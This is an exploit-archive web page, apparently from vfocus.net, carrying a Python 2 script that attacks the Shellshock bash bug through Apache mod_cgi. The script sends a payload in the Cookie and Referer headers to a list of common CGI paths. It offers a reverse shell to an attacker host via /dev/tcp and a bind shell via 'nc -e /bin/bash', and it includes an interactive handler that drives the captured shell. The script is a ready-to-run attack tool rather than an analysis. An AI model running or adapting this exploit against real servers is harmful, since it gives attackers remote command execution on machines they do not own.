首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apache mod_cgi - Remote Exploit (Shellshock)
来源:vfocus.net 作者:Galatolo 发布时间:2014-10-08  

#! /usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sys

stop = False
proxyhost = ""
proxyport = 0

def usage():
 print """

  Shellshock apache mod_cgi remote exploit

Usage:
./exploit.py var=<value>

Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages:  specific cgi vulnerable pages (separated by comma)
proxy: host:port proxy

Payloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)

Example:

./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234

Credits:

Federico Galatolo 2014
"""
 sys.exit(0)

def exploit(lhost,lport,rhost,rport,payload,pages):
 headers = {"Cookie": payload, "Referer": payload}
 
 for page in pages:
  if stop:
   return
  print "[-] Trying exploit on : "+page
  if proxyhost != "":
   c = httplib.HTTPConnection(proxyhost,proxyport)
   c.request("GET","http://"+rhost+page,headers=headers)
   res = c.getresponse()
  else:
   c = httplib.HTTPConnection(rhost)
   c.request("GET",page,headers=headers)
   res = c.getresponse()
  if res.status == 404:
   print "[*] 404 on : "+page
  time.sleep(1)
  

args = {}
 
for arg in sys.argv[1:]:
 ar = arg.split("=")
 args[ar[0]] = ar[1]
try:
 args['payload']
except:
 usage()
 
if args['payload'] == 'reverse':
 try:
  lhost = args['lhost']
  lport = int(args['lport'])
  rhost = args['rhost']
  payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
 except:
  usage()
elif args['payload'] == 'bind':
 try:
  rhost = args['rhost']
  rport = args['rport']
  payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
 except:
  usage()
else:
 print "[*] Unsupported payload"
 usage()
 
try:
 pages = args['pages'].split(",")
except:
 pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]

try:
 proxyhost,proxyport = args['proxy'].split(":")
except:
 pass
   
if args['payload'] == 'reverse':
 serversocket = socket(AF_INET, SOCK_STREAM)
 buff = 1024
 addr = (lhost, lport)
 serversocket.bind(addr)
 serversocket.listen(10)
 print "[!] Started reverse shell handler"
 thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
if args['payload'] == 'bind':
 serversocket = socket(AF_INET, SOCK_STREAM)
 addr = (rhost,int(rport))
 thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))
 
buff = 1024
 
while True:
 if args['payload'] == 'reverse':
  clientsocket, clientaddr = serversocket.accept()
  print "[!] Successfully exploited"
  print "[!] Incoming connection from "+clientaddr[0]
  stop = True
  clientsocket.settimeout(3)
  while True:
   reply = raw_input(clientaddr[0]+"> ")
   clientsocket.sendall(reply+"\n")
   try:
    data = clientsocket.recv(buff)
    print data
   except:
    pass
  
 if args['payload'] == 'bind':
  try:
   serversocket = socket(AF_INET, SOCK_STREAM)
   time.sleep(1)
   serversocket.connect(addr)
   print "[!] Successfully exploited"
   print "[!] Connected to "+rhost
   stop = True
   serversocket.settimeout(3)
   while True:
    reply = raw_input(rhost+"> ")
    serversocket.sendall(reply+"\n")
    data = serversocket.recv(buff)
    print data
  except:
   pass


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Kolibri Webserver 2.0 Buffer O
·Postfix SMTP - Shellshock Expl
·GNU bash 4.3.11 Environment Va
·OpenVPN 2.2.29 - ShellShock Ex
·Pure-FTPd External Authenticat
·Bash - CGI RCE (MSF) Shellshoc
·HP Network Node Manager I PMD
·IPFire Cgi Web Interface Authe
·ManageEngine OpManager / Socia
·Wordpress Slideshow Gallery 1.
·Asx to Mp3 2.7.5 - Stack Overf
·Advanced Information Security
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved